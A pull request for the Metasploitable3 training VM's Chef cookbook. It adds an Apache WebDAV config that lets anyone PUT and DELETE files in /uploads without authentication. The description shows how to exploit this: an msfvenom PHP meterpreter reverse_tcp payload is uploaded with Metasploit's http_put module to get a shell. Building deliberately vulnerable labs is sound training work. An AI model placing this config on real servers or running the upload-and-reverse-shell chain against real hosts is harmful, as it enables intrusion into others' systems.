### PR TITLE
Enable WebDAV on Apache

### DIFF
--- a/chef/cookbooks/metasploitable/files/apache/dav.conf
+++ b/chef/cookbooks/metasploitable/files/apache/dav.conf
@@ -1,0 +1,39 @@
+#
+# Distributed authoring and versioning (WebDAV)
+#
+# Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias
+#                   mod_auth_digest, mod_authn_file
+#
+
+# The following example gives DAV write access to a directory called
+# "uploads" under the ServerRoot directory.
+#
+# The User/Group specified in httpd.conf needs to have write permissions
+# on the directory where the DavLockDB is placed and on any directory where
+# "Dav On" is specified.
+
+Alias /uploads "/var/www/uploads"
+
+<Directory "/var/www/uploads">
+    AllowOverride All
+    Dav On
+
+    <Limit GET HEAD POST DELETE OPTIONS PUT>
+        Order Allow,Deny
+        Allow from all
+    </Limit>
+</Directory>
+
+#
+# The following directives disable redirects on non-GET requests for
+# a directory that does not include the trailing slash.  This fixes a
+# problem with several clients that do not appropriately handle
+# redirects for folders with DAV methods.
+#
+BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully
+BrowserMatch "MS FrontPage" redirect-carefully
+BrowserMatch "^WebDrive" redirect-carefully
+BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully
+BrowserMatch "^gnome-vfs/1.0" redirect-carefully
+BrowserMatch "^XML Spy" redirect-carefully
+BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully


### PR DESCRIPTION
This PR enables all necessary WebDAV modules for Apache and the appropriate configs to be able to upload files.

Verification (mostly stolen from [here](https://github.com/rapid7/metasploitable3/pull/16)):
- [x] Do: `vagrant destroy && vagrant up` to build the image
- [x] Once you're in the VM, you should see that port 80 is running
- [x] In your terminal, do: `nc IP 80`
- [x] And then type: `PUT /uploads/test.txt HTTP/1.0`, and then hit [ENTER] twice
- [x] You should see that the server responds with **HTTP/1.1 201 Created**
- [x] On Metasploitable3, if you go to /var/www/uploads, you should see the test.txt file

For exploitation:
- [x] Generate a PHP meterpreter: `./msfvenom -p php/meterpreter/reverse_tcp lhost=[IP] lport=5555 -f raw -o /tmp/evil.php`
- [x] Open a msfconsole, and start a handler for the php/meterpreter/reverse_tcp
- [x] Open another msfconsole, do: `use auxiliary/scanner/http/http_put`
- [x] Do: `set FILEDATA file://tmp/evil.php`
- [x] Do: `set FILENAME evil.php`
- [x] Do: `set RHOSTS [IP]`
- [x] Do: `set RPORT 80`
- [x] Do: `run`
- [x] If http_put module hangs, check the other msfconsole, there might a payload session established. If you don't see a session, manually request: http://IP:80/uploads/evil.php, and that should get you a session.